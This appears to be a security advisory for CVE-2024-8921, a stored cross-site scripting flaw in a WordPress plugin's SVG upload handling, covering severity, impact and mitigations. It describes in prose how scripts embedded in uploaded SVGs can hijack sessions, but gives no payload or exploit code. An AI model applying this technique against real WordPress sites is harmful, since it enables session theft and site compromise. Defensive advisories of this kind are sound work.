CVE-2024-8921 is a medium-severity stored cross-site scripting vulnerability identified in the Zita Elementor Site Library plugin for WordPress, affecting all versions up to and including 1.6.3. The vulnerability stems from insufficient sanitization and escaping of SVG file uploads, allowing authenticated users with Author-level or higher privileges to upload SVG files containing malicious JavaScript code. When other users or administrators access pages embedding these SVG files, the malicious scripts execute in their browsers, potentially leading to session hijacking, privilege escalation, or unauthorized actions within the WordPress site. The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). The CVSS v3.1 base score is 6.4, reflecting network attack vector, low attack complexity, requiring privileges but no user interaction, and partial impact on confidentiality and integrity. The scope is changed, indicating that the vulnerability affects components beyond the initially vulnerable plugin, potentially impacting the entire WordPress site context. No public exploits have been reported yet, and no official patches have been linked at the time of publication. The vulnerability requires authenticated access with Author or higher privileges, which limits exposure to some extent but still poses a significant risk in multi-user WordPress environments where authors can upload media. The attack leverages the SVG format's capability to embed scripts, which are not properly sanitized by the plugin, allowing persistent script injection that executes whenever the SVG is rendered in a page. This can be used to steal cookies, perform actions on behalf of users, or pivot to further compromise the site.

The primary impact of CVE-2024-8921 is the execution of arbitrary scripts in the context of the vulnerable WordPress site, which can compromise the confidentiality and integrity of user sessions and site content. Attackers with Author-level access can embed malicious scripts that execute for any user viewing the infected SVG, potentially leading to session hijacking, unauthorized content modification, or privilege escalation. While availability is not directly affected, the breach of trust and potential for further exploitation can disrupt normal operations. Organizations using the Zita Elementor Site Library plugin are at risk of targeted attacks, especially in environments with multiple authors or contributors. The vulnerability could be leveraged in combination with social engineering or other attacks to compromise administrative accounts or inject malware. Given WordPress's widespread use, this vulnerability could affect a large number of websites, particularly those that allow multiple authenticated users to upload media. The lack of a patch and known exploits in the wild increases the urgency for mitigation to prevent potential exploitation.

To mitigate CVE-2024-8921, organizations should immediately restrict upload permissions to trusted users only, ideally limiting SVG uploads or disabling them entirely if not required. Implement strict role-based access control to ensure only highly trusted users have Author-level or higher privileges. Employ web application firewalls (WAFs) with rules to detect and block malicious SVG payloads or suspicious script content within uploads. Monitor media libraries for unusual SVG files and scan uploads for embedded scripts using specialized security tools. Until an official patch is released, consider removing or disabling the Zita Elementor Site Library plugin if SVG upload functionality is not critical. Educate content creators and administrators about the risks of uploading untrusted SVG files. Additionally, keep WordPress core and all plugins updated to minimize exposure to other vulnerabilities. Regularly audit user roles and permissions to reduce the attack surface. Finally, implement Content Security Policy (CSP) headers to restrict script execution sources, which can help mitigate the impact of injected scripts.